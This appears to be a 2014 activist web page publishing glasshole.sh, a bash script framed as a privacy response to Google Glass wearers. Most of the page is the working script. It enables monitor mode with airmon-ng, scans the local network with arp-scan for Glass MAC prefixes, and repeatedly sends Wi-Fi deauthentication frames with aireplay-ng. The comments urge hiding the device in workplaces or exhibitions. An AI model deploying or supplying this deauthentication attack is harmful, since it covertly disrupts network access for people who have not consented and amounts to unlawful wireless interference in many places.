glasshole.sh

Find a Google Glass device and kick it from the network

Oliver, 2014

glasshole

“Privacy is the power to selectively reveal oneself to the world.”

CONTEXT

This script is a response to a comment by Omer Shapira that the presence of Google Glass worn by audience at an ITP (New York) graduate exhibition left him feeling understandably uneasy; it was not possible to know whether they were recording, or even streaming what they were recording to a remote service over WiFi.

It follows a productive and open-chested rant by Omer on the suspect interests and expectations of some audience at the ITP show.

CODE

The below script will find and detect Google Glass on the local network and kick them off. Read the code comments for more details.

#!/bin/bash
#
# GLASSHOLE.SH
#
# Find and kick Google Glass devices from your local wireless network.  Requires
# 'beep', 'arp-scan', 'aircrack-ng' and a GNU/Linux host.  Put on a BeagleBone
# black or Raspberry Pi. Plug in a good USB wireless NIC (like the TL-WN722N)
# and wear it, hide it in your workplace or your exhibition.
#
# Save as glasshole.sh, 'chmod +x glasshole.sh' and exec as follows:
#
#   sudo ./glasshole.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>
# 
# Thanks to Jens Killus for new rev Glass MAC addr and extglob hint (phew).
# Thanks to Tim Meusel for line pulling MAC from 'ip' rather than legacy 'ifconfig'

shopt -s nocasematch # Set shell to ignore case
shopt -s extglob # For non-interactive shell.

NIC=$1 # Your wireless NIC
BSSID=$2 # Network BSSID (exhibition, workplace, park)
MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
# MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not present.
GGMAC='@(F8:8F:CA:24*|F8:8F:CA:25*)' # Match against old and new Glass. 
POLL=30 # Check every 30 seconds

airmon-ng stop mon0 # Pull down any lingering monitor devices
airmon-ng start $NIC # Start a monitor device

echo '
   ___           _ __    __                     __             __        __   
  / _ \___  ___ ( ) /_  / /  ___   ___ _  ___ _/ /__ ____ ___ / /  ___  / /__ 
 / // / _ \/ _ \|/ __/ / _ \/ -_) / _ `/ / _ `/ / _ `(_-<(_-</ _ \/ _ \/ / -_)
/____/\___/_//_/ \__/ /_.__/\__/  \_,_/  \_, /_/\_,_/___/___/_//_/\___/_/\__/ 
                                        /___/                                 
'

while true;
    do  
        for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
        '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
           do
               if [[ $TARGET == $GGMAC ]]
                   then
                       # Audio alert
                       beep -f 1000 -l 500 -n 200 -r 2
                       echo "Glasshole discovered: "$TARGET
                       echo "De-authing..."
                       aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 
                    else
                        echo $TARGET": is not a Google Glass. Leaving alone.."
               fi
           done
           echo "None found this round."
           sleep $POLL
done
airmon-ng stop mon0

UPDATE 31.05.14: Moved airmon-ng virtual monitor device creation out of main loop to speed things up.

UPDATE 05.06.14: Adopted extglob hint by Jens Killus and added new revision Glass MAC addr.

UPDATE 07.10.14: Added commented line using ‘ip’ rather than legacy ‘ifconfig’, by Tim Meusel.

PRESS